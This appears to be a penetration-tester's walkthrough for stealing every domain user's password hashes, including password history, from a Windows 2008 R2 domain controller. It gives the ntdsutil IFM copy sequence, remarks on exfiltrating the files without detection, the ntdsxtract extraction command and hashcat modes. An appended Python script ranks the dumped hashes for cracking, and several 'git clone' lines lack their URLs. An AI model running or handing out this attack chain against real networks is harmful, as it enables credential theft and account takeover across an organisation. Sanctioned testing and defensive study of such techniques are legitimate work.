credential mining a domain controller

the target system was Windows Server 2008 R2

the active directory database (the file ntds.dit) holds the current password hashes of every domain user, plus their password history (as many previous hashes as the domain's history policy keeps): a goldmine. the hashes are stored encrypted, and the key that protects them is itself derived from the boot key held in the SYSTEM registry hive, which is why you need that hive alongside ntds.dit

taking a copy of the files
the relevant files (ntds.dit and the SYSTEM registry hive; the SAM only holds local accounts, not domain ones) are held open by the OS while the DC is running, so a plain copy fails and you need a tool that takes the copy from a volume shadow copy or straight off the raw disk

several other tools will do it (e.g. vssadmin to create a shadow copy and copy the files out of it, ninjacopy to read them straight off the raw volume, …)

i used ntdsutil because it seemed the simplest in my case

note that "create full" lives under the ifm (install from media) sub-menu, so the full sequence at the ntdsutil prompt is:

activate instance ntds
ifm
create full c:\backup
quit
quit

this takes a shadow copy and writes c:\backup\Active Directory\ntds.dit plus c:\backup\registry\SYSTEM (and SECURITY), which is where the "Active Directory" and "registry" directories referred to below come from

installing the utils
i elected to exfiltrate the files and process them in kali

in the case of a large domain the files can run to gigabytes, and exfiltrating that much without detection may present its own challenges

there are alternative methods for in-situ extraction, and even a metasploit module which will perform the attack in memory on the target and stream the results to you. i chose this option because the domain wasn't very big, and it meant that after transferring the files i was under no time pressure: i didn't need to worry about being kicked off while figuring stuff out

building/installing libesedb
i had problems building libesedb initially, but after cycling through re-running a few times, it just worked

if you get the error ‘Missing file remove function’, add ‘#define HAVE_UNLINK 1’ to libcfile/libcfile_support.c (i experienced this error in one build, but not in another – strange!)

apt-get install git autoconf automake autopoint libtool pkg-config build-essential
git clone
cd libesedb
./synclibs.sh
./autogen.sh
./configure
make
make install
ldconfig

a git checkout needs ./synclibs.sh to pull in the libyal helper libraries before autogen/configure will work, and ldconfig afterwards lets esedbexport find the freshly installed shared library

installing ntdsxtract
cd /opt
git clone

ntdsxtract is a python 2 tool and needs the Crypto module (pycrypto) to decrypt the hashes

hash extraction
in the directory where the “Active Directory” and “registry” dirs are, which you exfiltrated:

esedbexport -m tables "Active Directory/ntds.dit"
python /opt/ntdsxtract/ ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 hashdumpwork --syshive registry/SYSTEM --lmoutfile $PWD/lm-out.txt --ntoutfile $PWD/nt-out.txt --pwdformat ocl --passwordhashes --passwordhistory | tee ntdxtract.out

note that the table names might be different: esedbexport appends a table number to each exported file and it varies between databases. here i'm using 'datatable.3' but it might be 'datatable.7' or whatever; same deal with link_table. check with ls ntds.dit.export/ before running the second command

i had problems exporting the hashes to lm-out.txt and nt-out.txt until i fully specified the path. weird

now crack those hashes with hashcat: mode 1000 for the NT hashes and mode 3000 for any LM hashes. do the LM ones first if there are any, since they fall quickly and the (case-insensitive) result makes a good seed for the NT run
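before spending GPU time it is worth triaging the dump: blank passwords need no cracking, accounts that still have a real LM hash are the cheap wins, accounts sharing a hash fall together, and a current hash that also appears in the user's own history points at a reset or cycling trick. the script below is an added example, not code from the post or from ntdsxtract; it assumes one "name:hash" line per entry, NT and LM dumps in separate files, and history rows named "<user>_nthistory<n>" (adjust HISTORY_RE if your dump labels them differently). the sample data is constructed.

```python
# Added example, not from the original post: triage an ntdsxtract-style hash
# dump before handing it to hashcat. Assumptions: one "name:hash" line per
# entry, NT and LM dumps in separate files, and password-history rows named
# "<user>_nthistory<n>" / "<user>_lmhistory<n>" (adjust HISTORY_RE if your dump
# labels them differently). All sample data below is constructed.
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is off / password blank
HISTORY_RE = re.compile(r"^(?P<user>.+)_(?:nt|lm)history(?P<idx>\d+)$")
HASH_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_dump(lines):
    """Split "name:hash" lines into (current, history).

    current: user -> hash. history: user -> [hash, ...] in history-index order.
    Lines without a 32-hex-digit hash are skipped rather than aborting the run.
    """
    current, history = {}, defaultdict(dict)
    for raw in lines:
        line = raw.strip()
        if ":" not in line:
            continue
        name, h = line.rsplit(":", 1)
        h = h.lower()
        if not HASH_RE.match(h):
            continue
        m = HISTORY_RE.match(name)
        if m:
            history[m["user"]][int(m["idx"])] = h
        else:
            current[name] = h
    ordered = {u: [hs[i] for i in sorted(hs)] for u, hs in history.items()}
    return current, ordered


def blank_passwords(current, empty=EMPTY_NT):
    """Accounts whose current hash is the empty-password hash: no cracking needed."""
    return sorted(u for u, h in current.items() if h == empty)


def lm_present(lm_current):
    """Accounts that still have a real LM hash stored (fast, case-insensitive cracks)."""
    return sorted(u for u, h in lm_current.items() if h != EMPTY_LM)


def shared_hashes(current):
    """Accounts sharing a hash: one crack recovers all of them, and it flags reuse."""
    by_hash = defaultdict(list)
    for u, h in current.items():
        by_hash[h].append(u)
    return {h: sorted(us) for h, us in by_hash.items() if len(us) > 1}


def history_recycled(current, history):
    """Users whose current hash also appears in their own password history.

    AD's history check blocks this for normal user-initiated changes, so a hit
    usually means an admin reset or some cycling trick got around it.
    """
    return sorted(u for u, h in current.items() if h in history.get(u, ()))


def hashcat_lines(current, history):
    """'name:hash' lines for `hashcat -m 1000 --username`; history rows keep a
    suffix so a cracked old password is still reported against the right user."""
    out = [f"{u}:{h}" for u, h in current.items()]
    out += [f"{u}_nthistory{i}:{h}" for u, hs in history.items() for i, h in enumerate(hs)]
    return sorted(set(out))


def triage(nt_lines, lm_lines):
    """Run every check over an NT dump and an LM dump and return the findings."""
    nt_current, nt_history = parse_dump(nt_lines)
    lm_current, _ = parse_dump(lm_lines)
    return {
        "blank": blank_passwords(nt_current),
        "lm": lm_present(lm_current),
        "shared": shared_hashes(nt_current),
        "recycled": history_recycled(nt_current, nt_history),
        "hashcat": hashcat_lines(nt_current, nt_history),
    }


# Constructed sample dumps (hash values are arbitrary hex, not real accounts).
SAMPLE_NT = """\
Administrator:0123456789abcdef0123456789abcdef
alice:11111111222222223333333344444444
bob:11111111222222223333333344444444
svc_backup:31d6cfe0d16ae931b73c59d7e0c089c0
alice_nthistory0:fedcba9876543210fedcba9876543210
alice_nthistory1:11111111222222223333333344444444
carol:not-a-hash
""".splitlines()
SAMPLE_LM = """\
Administrator:aad3b435b51404eeaad3b435b51404ee
alice:aad3b435b51404eeaad3b435b51404ee
bob:00112233445566778899aabbccddeeff
""".splitlines()

if __name__ == "__main__":
    for key, value in triage(SAMPLE_NT, SAMPLE_LM).items():
        print(key, value)
```

run it against nt-out.txt and lm-out.txt instead of the samples (`triage(open("nt-out.txt"), open("lm-out.txt"))`) and feed the "hashcat" list to hashcat with --username; the other four lists are findings in their own right for the report, whether or not the hashes ever crack.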
